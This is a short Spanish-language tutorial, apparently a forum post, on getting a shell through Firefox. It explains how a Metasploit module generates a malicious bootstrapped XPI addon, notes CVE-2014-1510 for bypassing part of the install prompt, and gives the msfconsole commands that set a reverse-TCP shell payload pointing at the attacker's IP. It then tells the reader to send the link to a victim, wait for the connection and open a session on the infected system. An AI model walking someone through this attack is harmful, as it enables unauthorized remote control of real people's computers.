Obtener Shell con Firefox



Este exploit dinámicamente crea un archivo de addon XPI.. El bootstrap addon Firefox resultante se presenta a la víctima a través de una página web.
Navegador Firefox de la víctima se abrirá un cuadro de diálogo preguntando si confían en el addon. Una vez que el usuario hace clic en "install", el complemento se instala y ejecuta la carga útil con permisos de usuario. A partir de Firefox 4, esto va a funcionar sin un reinicio como el addon está marcado para ser "bootstrap". A medida que el complemento se ejecutará la carga útil después de cada reinicio Firefox, una opción puede ser dada a desinstalar automáticamente el complemento una vez que la carga ha sido ejecutado. En Firefox 22,0-27,0, CVE-2014-1510 nos permite saltarnos la primera mitad de los permisos con prontitud.

En este caso se obtendra una shell del sistema pero podemos convertir esa shell

en una sesión de meterpreter con varias tecnicas.







Cita:msf use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit (firefox_xpi_bootstrapped_addon)>set payload
firefox/shell_reverse_tcp
msf exploit (firefox_xpi_bootstrapped_addon)>set lhost(IP)
msf exploit (firefox_xpi_bootstrapped_addon)>set uripath /
msf exploit (firefox_xpi_bootstrapped_addon)>exploit

Solo hay que enviar el enlace a la victima,se tendra que instalar el addon para firefox.





Esperamos la conexion y ejecutamos el comnado de sessions para comprobar si llego la shell.


Arrancamos la sesión con el numero de id y listo tenemos una shell del sistema infectado con el comando HELP podemos ver todas las opciones que nos permite realizar en el sistema.